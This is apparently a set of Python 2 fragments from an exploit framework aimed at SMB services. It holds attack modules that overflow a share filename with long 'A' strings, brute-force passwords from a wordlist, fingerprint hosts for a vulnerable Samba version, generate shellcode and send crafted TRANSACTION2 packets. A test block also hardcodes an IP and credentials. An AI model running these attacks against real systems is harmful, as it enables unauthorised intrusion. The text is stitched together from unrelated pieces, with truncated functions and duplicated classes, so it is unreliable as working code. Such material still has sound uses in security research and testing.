def run(self):
self.getargs()
self.setInfo('%s attacking %s:%d (in progress)' %
(NAME, self.host, self.port))
s = self.getsocket()
sockaddr = (self.host, self.port)
connected = False
try:
s.connect(sockaddr)
connected = True
except:
self.log('Could not connect to: %s:%d' % sockaddr)
if not connected:
self.setInfo('%s attacking %s:%d - done (failed)' %
(NAME, self.host, self.port))
return 0
my_smb = SMBClient(s, username=self.user, password=self.password)
try:
my_smb.negotiate()
my_smb.session_setup()
my_smb.tree_connect(self.share)
attackstring = 'A' * 0x800
my_smb.find_first(filename=attackstring, response=False)
except SMBClientException, ex:
self.log('SMB Error: %s' % ex)
return 0
def run(self):
self.getArgs()
self.log('%s running against %s:%s covertness: %d' %
(NAME, self.host, self.port, self.covertness))
self.setInfo('%s attacking %s:%s (Covertness:%d) - running' %
(NAME, self.host, self.port, self.covertness))
self.log('Share is: %s' % self.share)
try:
passwords = file(self.filename).readlines()
except:
self.log('Failed to open password file %s' % (self.filename))
return 0
passwords.insert(0, self.username)
passwords.insert(0, u'')
sockaddr = (self.host, self.port)
try:
s = self.getsocket()
s.connect(sockaddr)
smbobj = SMBClient(s, username=self.username)
smbobj.negotiate()
except SMBClientException, ex:
self.log('Failed to negotiate: %s' % ex)
return 0
def test(self):
"""
Connect to the target and spawn a vfs-shell if we get a connection
"""
self.getargs()
self.setInfo("%s attacking %s:%d (Covertness:%d) - running" %\
(NAME, self.host, self.port, self.covertness))
s = self.getsocket()
sockaddr = (self.host, self.port)
try:
s.connect(sockaddr)
except:
self.log('Could not connect to %s:%d' % sockaddr)
return 0
self.log_info(u"Using domain=%s user=%s, password %s" % (self.domain, self.user, self.password))
smbobj = SMBClient(s, username=self.user, password=self.password, domain=self.domain)
smbobj.is_unicode = True
try:
smbobj.negotiate()
smbobj.session_setup()
self.log_info("Trying treeconnect_AndX on share %s" % self.filename)
smbobj.tree_connect(self.filename)
self.log_info("Connected to share %s" % self.filename)
except SMBClientException, ex:
self.log_error('Error during SMB operations: %s' % ex)
return 0
class DCERPCOverSMB(DCERPCConnection):
def __init__(self, s, address, port, named_pipe, username=None, password=None, domain=None, kerberos_db=None, use_krb5=False, frag_level=None):
DCERPCConnection.__init__(self, s, address, port, username, password, domain)
self.named_pipe = named_pipe
self.smb = None
self.frag_level = frag_level
self.kerberos_db = kerberos_db
self.use_krb5 = use_krb5
def connect(self):
# Return 0 for success, 1 for error
sockaddr = (self.address, self.port)
try:
self.s.connect(sockaddr)
if self.smb == None:
self.smb = SMBClient(self.s, username=self.username, password=self.password, domain=self.domain, frag_level=self.frag_level)
self.smb.is_unicode = True
self.smb.negotiate()
self.smb.session_setup(kerberos_db=self.kerberos_db, use_krb5=self.use_krb5)
self.smb.tree_connect(u'IPC$')
self.smb.nt_create(name=self.named_pipe, desired_access=SYNCHRONIZE|FILE_READ_DATA|FILE_WRITE_DATA|FILE_APPEND_DATA|FILE_READ_EA|FILE_WRITE_EA|FILE_READ_ATTRIBUTES|FILE_WRITE_ATTRIBUTES|READ_CONTROL,
share_access = FILE_SHARE_READ|FILE_SHARE_WRITE)
except Exception, ex:
logging.debug('Error during SMB operations: %s' % ex)
return 1
return 0
def run(self):
"""
Connect to the target and spawn a vfs-shell if we get a connection
"""
self.result = []
self.getargs()
self.log_info("%s running against %s:%d covertness: %d" %\
(NAME, self.host, self.port, self.covertness))
self.setInfo("%s attacking %s:%d (Covertness:%d) - running" %\
(NAME, self.host, self.port, self.covertness))
self.log_info(u"Using domain=%s user=%s, password %s" %\
(self.domain, self.user, self.password))
# Sanity check: the ccache credentials
if self.ccache_file:
if not self.check_ccache_file():
self.log_error('%s doesn\'t seem to be a valid ccache file for user %s' % (self.ccache_file, '@'.join([self.user,self.domain])))
return 0
else:
self.use_kerberos = True
self.log_info("Using kerberos authentication with credentials %s" % self.ccache_file)
else:
self.log_info("Using NTLM authentication")
connected = False
for p in set([self.port, 445]):
s = self.getsocket()
sockaddr = (self.host, p)
try:
s.connect(sockaddr)
connected = True
self.port = p
break
except:
self.log_error("Could not connect to %s:%d" % sockaddr)
if not connected:
return 0
retry = False
if self.use_kerberos:
smbobj = SMBClient(s, self.user, self.password, self.domain, kerberos_db=self.ccache_file, use_krb5=True)
else:
smbobj = SMBClient(s, self.user, self.password, self.domain)
try:
smbobj.negotiate()
smbobj.session_setup()
except SMBClientException, ex:
self.log_error('Error during SMB session setup: %s' % ex)
retry = True
def test(self):
self.getArgs()
self.log('%s running against %s:%s covertness: %d' %
(NAME, self.host, self.port, self.covertness))
self.setInfo('%s attacking %s:%s (Covertness:%d) - running' %
(NAME, self.host, self.port, self.covertness))
sockaddr = (self.host, self.port)
s = self.getsocket()
try:
s.connect(sockaddr)
except:
self.log('Could not connect to remote host')
return 0
try:
smbobj = SMBClient(s, username=self.username)
smbobj.negotiate()
except SMBClientException, ex:
self.log('Could not negotiate with SMB server: %s' % ex)
return 0
def do_detect(self, unicode=True):
try:
s = self.gettcpsock()
s.connect((self.host, self.port))
smbobj = SMBClient(s,
username=self.username,
password=self.password)
smbobj.is_unicode = unicode
smbobj.extended_security = True
smbobj.negotiate()
smbobj.session_setup()
return smbobj.nativeos, smbobj.nativelanman
finally:
s.close()
def connect(self):
# Return 0 for success, 1 for error
sockaddr = (self.address, self.port)
try:
self.s.connect(sockaddr)
preexisting_smb = False
if self.smb:
preexisting_smb = True
if self.smb == None:
self.smb = SMBClient(self.s,
username=self.username,
password=self.password,
domain=self.domain,
frag_level=self.frag_level)
self.smb.is_unicode = True
# This has to be done only for new connections
# If we are reusing an existing SMB connection there is no need to
# re-negotiate and setup_session
if preexisting_smb == False:
self.smb.negotiate()
self.smb.session_setup(kerberos_db=self.kerberos_db,
use_krb5=self.use_krb5)
self.smb.tree_connect(u'IPC$')
self.smb.nt_create(
name=self.named_pipe,
desired_access=SYNCHRONIZE | FILE_READ_DATA | FILE_WRITE_DATA
| FILE_APPEND_DATA | FILE_READ_EA | FILE_WRITE_EA
| FILE_READ_ATTRIBUTES | FILE_WRITE_ATTRIBUTES | READ_CONTROL,
share_access=FILE_SHARE_READ | FILE_SHARE_WRITE)
return 0
except Exception as e:
logging.error('DCERPCOverSMB.connect() failed: %s' % str(e))
return 1
def test(self):
""" use share enum to find Asus Eee PC string """
self.host = self.target.interface
self.port = int(self.argsDict.get("port", self.port))
ret = self.exploitnodes("shareenum")
if ret in [None, []]:
self.log("[-] No shares found")
else:
for share in ret[0]:
self.log("[+] Share comment: %s" % share.comment)
if "ASUS EEE PC" in share.comment.upper().replace('\x00', ''):
self.log(
"[!] Found ASUS Eee PC .. trying to determine SAMBA version :>"
)
if ':' in self.host:
s = self.gettcpsock(AF_INET6=1)
else:
s = self.gettcpsock()
try:
smb = SMBClient(s)
smb.negotiate()
smb.session_setup()
except SMBClientException, ex:
self.log('[-] Could not SMB connect: %s' % ex)
return 0
self.log(u"[+] OS: %s LANMAN: %s" %
(smb.nativeos, smb.nativelanman))
# we can be pedantic if we want .. by why is this not smb.server ???
if u"Samba 3.0.24" in smb.nativelanman:
self.log("[!] Found vulnerable SAMBA version :D")
self.version = 1
return 1
def do_smb(self):
""" do windows SMB detection """
result = None
self.log("SMB DETECT: Doing SMB OS Detection")
smbobj = None
port = 445
nativeos = u''
lanman = u''
domain = u''
server = u''
def get_socket():
if ':' in self.host:
return self.gettcpsock(AF_INET6=1)
else:
return self.gettcpsock()
try:
sockaddr = (self.host, port)
s = get_socket()
s.connect(sockaddr)
# First do the negotiation without extended security (get domainname/servername)
smbobj = SMBClient(s, username=self.user, password=self.password)
smbobj.is_unicode = True
smbobj.extended_security = False
smbobj.negotiate()
s.close()
domain = unicode(smbobj.primarydomain)
server = unicode(smbobj.servername)
# Now we do a complete session setup exchange
s = get_socket()
s.connect(sockaddr)
smbobj = SMBClient(s, username=self.user, password=self.password)
smbobj.is_unicode = True
smbobj.extended_security = True
smbobj.negotiate()
smbobj.session_setup()
s.close()
nativeos = unicode(smbobj.nativeos)
lanman = unicode(smbobj.nativelanman)
except SMBException, ex:
self.log('SMB error: %s' % ex)
return None
class theexploit(tcpexploit):
def __init__(self):
tcpexploit.__init__(self)
self.setVersions()
self.domain = ''
self.host = ""
self.port = 445
self.version = 0
self.user = u''
self.name = NAME
self.ccache_file = None
self.use_kerberos = False
self.badstring = "\x00\\/.:?\r\n%?"
def getargs(self):
self.host = self.target.interface
self.user = self.argsDict.get("user", self.user)
self.port = self.argsDict.get("port", self.port)
self.password = self.argsDict.get("password", self.password)
self.domain = self.argsDict.get("domain", self.domain)
self.ccache_file = self.argsDict.get('krb5_ccache', self.ccache_file)
self.socknode = self.argsDict["passednodes"][0]
def createShellcode(self):
self.createLinuxGOShellcode(self.badstring)
def getsocket(self):
if ':' in self.host:
return self.gettcpsock(AF_INET6=1)
else:
return self.gettcpsock()
def check_ccache_file(self):
try:
# Can we open the credential file?
cc1 = cc.CCache()
cc1.open(self.ccache_file, new=0)
# Is the DB related to the username?
principal = cc1.get_primary_principal()
user_domain = '@'.join([self.user, self.domain]).lower()
if user_domain != principal.lower():
return False
# Do we have credential information that is not only configuration?
creds = cc1.get_credentials()
found_valid_creds = 0
for cred in creds:
if not cred.is_config_credential():
found_valid_creds = 1
if not found_valid_creds:
return False
else:
return True
except Exception as e:
return False
else:
return True
def getsmbobj(self, sharename):
s = self.getsocket()
sockaddr = (self.host, self.port)
try:
s.connect(sockaddr)
except Exception, ex:
logging.error('Error during connect to %s:%d %r' %
(sockaddr[0], sockaddr[1], ex))
return None
if self.use_kerberos:
smbobj = SMBClient(s,
self.user,
self.password,
self.domain,
kerberos_db=self.ccache_file,
use_krb5=True)
else:
smbobj = SMBClient(s, self.user, self.password, self.domain)
try:
smbobj.negotiate()
smbobj.session_setup()
except SMBClientException, ex:
logging.error('Error during SMB session setup: %s' % ex)
return None
class DCERPCOverSMB(DCERPCConnection):
def __init__(self,
s,
address,
port,
named_pipe,
username=None,
password=None,
domain=None,
kerberos_db=None,
use_krb5=False,
frag_level=None,
smb_client=None):
DCERPCConnection.__init__(self, s, address, port, username, password,
domain)
self.named_pipe = named_pipe
self.smb = None
self.frag_level = frag_level
self.kerberos_db = kerberos_db
self.use_krb5 = use_krb5
if smb_client:
self.smb = smb_client
def connect(self):
# Return 0 for success, 1 for error
sockaddr = (self.address, self.port)
try:
self.s.connect(sockaddr)
preexisting_smb = False
if self.smb:
preexisting_smb = True
if self.smb == None:
self.smb = SMBClient(self.s,
username=self.username,
password=self.password,
domain=self.domain,
frag_level=self.frag_level)
self.smb.is_unicode = True
# This has to be done only for new connections
# If we are reusing an existing SMB connection there is no need to
# re-negotiate and setup_session
if preexisting_smb == False:
self.smb.negotiate()
self.smb.session_setup(kerberos_db=self.kerberos_db,
use_krb5=self.use_krb5)
self.smb.tree_connect(u'IPC$')
self.smb.nt_create(
name=self.named_pipe,
desired_access=SYNCHRONIZE | FILE_READ_DATA | FILE_WRITE_DATA
| FILE_APPEND_DATA | FILE_READ_EA | FILE_WRITE_EA
| FILE_READ_ATTRIBUTES | FILE_WRITE_ATTRIBUTES | READ_CONTROL,
share_access=FILE_SHARE_READ | FILE_SHARE_WRITE)
return 0
except Exception as e:
logging.error('DCERPCOverSMB.connect() failed: %s' % str(e))
return 1
def recv(self, filesize=65535, option=0):
data = StringIO()
if filesize == 65535:
try:
to_read, _, _ = self.smb.transact_peek_np()
filesize = to_read
logging.debug('recv: %d' % filesize)
except SMBTransactException as e:
logging.debug('smb.transact_peek_np() failed: %s' % e)
# transact_peek_np may not be supported (i.e. samba)
# in that case we fall back to doing a big read
pass
if filesize == 0:
logging.debug('Returning from recv(), no data in pipe.')
return None
try:
self.smb.read(data, filesize=filesize)
except Exception as e:
logging.debug('smb.read() failed: %s' % str(e))
return None
return data.getvalue()
def send_recv(self, data, response=True, option=0):
try:
if (option & OPTION_SMB_TRANSACT) == 0:
send_data = StringIO(data)
self.smb.write(send_data)
if response == True:
ret = self.recv(option=option)
return ret
else:
return None
else:
data = self.smb.transact_np(data, response=response)
return data
except Exception as e:
logging.debug('DCERPCOverSMB.send_recv() failed: %s' % str(e))
return None
def disconnect(self):
try:
self.smb.tree_disconnect()
self.smb.logoff()
self.s.close()
except SMBException, ex:
logging.debug('DCERPCOverSMB.disconnect() failed: %s' % str(e))
sys.path.append('.')
from libs.newsmb.smbconst import *
from libs.newsmb.libsmb import SMBClient
NT_TRANSACT_IOCTL = 0x0002
if __name__ == '__main__':
from socket import socket
#import cStringIO
sockaddr = ('192.168.2.107', 445)
s = socket()
s.connect(sockaddr)
u = u'kostya'
p = u'basrules'
smb = SMBClient(s, u, p)
smb.is_unicode = True
smb.negotiate()
smb.session_setup()
if False:
smb.tree_connect(u'Empty')
smb.nt_create(name=u'sourcefile.bin\0',
desired_access=0x20089,
share_access=0x5,
disposition=0x1,
options=0x200044)
source_fid = smb.fid
smb.nt_create(name=u'destinationfile.bin\0',
desired_access=0x30197,
share_access=0x0,
disposition=0x5,
if retry:
if self.port != 445:
self.log_info('Retrying with port 445')
self.port = 445
try:
s = self.getsocket()
sockaddr = (self.host, self.port)
s.connect(sockaddr)
except:
return 0
if self.use_kerberos:
smbobj = SMBClient(s, username=self.user,
password=self.password,
domain=self.domain,
kerberos_db=self.ccache_file,
use_krb5=True)
else:
smbobj = SMBClient(s, username=self.user,
password=self.password,
domain=self.domain)
try:
smbobj.negotiate()
smbobj.session_setup()
smbobj.tree_connect(self.filename)
except SMBClientException, ex:
self.log_error(u'Failed to connect to share: %s' % ex)
return 0
else:
def run(self):
self.getargs()
self.setInfo('%s attacking %s:%d (in progress)' %
(NAME, self.host, self.port))
s = self.getsocket()
sockaddr = (self.host, self.port)
try:
s.connect(sockaddr)
except:
self.log('Could not connect to: %s:%d' % sockaddr)
return 0
try:
my_smb = SMBClient(s, username=self.user, password=self.password)
my_smb.negotiate()
my_smb.session_setup()
my_smb.tree_connect(u'IPC$')
my_smb.packet = SMBPacket(None,
SMB_COM_TRANSACTION2,
tid=my_smb.tid,
pid=my_smb.pid,
mid=my_smb.mid,
uid=my_smb.uid,
is_unicode=my_smb.is_unicode)
params = ''
params += struct.pack('<HHHLLHLLL', 0, 0, 0, 0, 0, 0, 0, 0, 0)
params += '\\browser'
params += '\0' * (4 - len(params) % 4)
my_smb.packet.body['Parameters'] = params
my_smb.packet.body['MaxParameterCount'] = 4
my_smb.packet.body['MaxDataCount'] = 0
my_smb.packet.body['Setup'] = '\x00\x00'
my_smb.packet.body['Pad'] = '\x00\x00'
my_smb.send()
except SMBClientException, ex:
self.log('SMB Error: %s' % ex)
return 0